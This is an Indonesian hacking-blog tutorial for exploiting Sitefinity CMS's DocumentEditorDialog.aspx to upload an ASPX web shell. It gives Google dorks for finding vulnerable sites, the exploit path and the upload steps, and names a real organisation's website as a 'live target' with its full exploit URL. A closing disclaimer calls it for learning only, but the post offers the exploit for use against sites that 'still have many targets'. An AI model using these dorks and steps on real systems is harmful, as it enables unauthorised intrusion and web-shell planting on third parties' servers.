Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]
Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]
Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini
Sudah Lama Ga ada Postingan nih Blog :'v Cuma mau share Exploit lama yang masih Banyak Targetnya :'v Yaitu "Exploit CMS Sitefinity Editor Dialogs" Mungkin dah ada Yang pernah makenya :'v
Langsung Saja...
Bahan Bahan :
1. shell aspx => Yang belom punya download disini
passwordnya : admin
2. Dork : - inurl:"/Sitefinity/login.aspx"
- "UserControls/Dialogs"
- "Sitefinity: Login"
3. Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
4. Dan yang paling Penting => "KESABARAN" :'v
Step By Step :
1. Dorking dulu ke Google inurl:"/Sitefinity/login.aspx"
2. Pilih Salah Satu Web Target
Live Target : http://www.calstart.org/
3. Masukkan Exploitnya Site.target/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Contoh : http://www.calstart.org/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Maka akan Seperti ini
4. Tinggal Kalian Upload shell aspx nya :'v
Tekan "select" => Pilih file upload => "upload selected"
5. Kemungkinan Vuln maka Tampilannya akan Seperti ini
6. Tinggal Buka akses shell kalian :'v
Akses shell => site.target/Files/nameshell.aspx
Terimakasih Atas Kunjungannya :)
Nitip Nick
=> GU3LT03M <=
Sekianlah Postingan Dari All Tutoc Cyber tentang "Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]" Semoga Bisa Bermanfaat!.
Anda Sekarang Sedang Membaca Postingan "Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]" Dengan URL https://ryangueltoem.blogspot.co.id/2017/07/exploit-cms-sitefinity-editor-dialogs.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.
Sekian. Terimakasih
All Tutor Cyber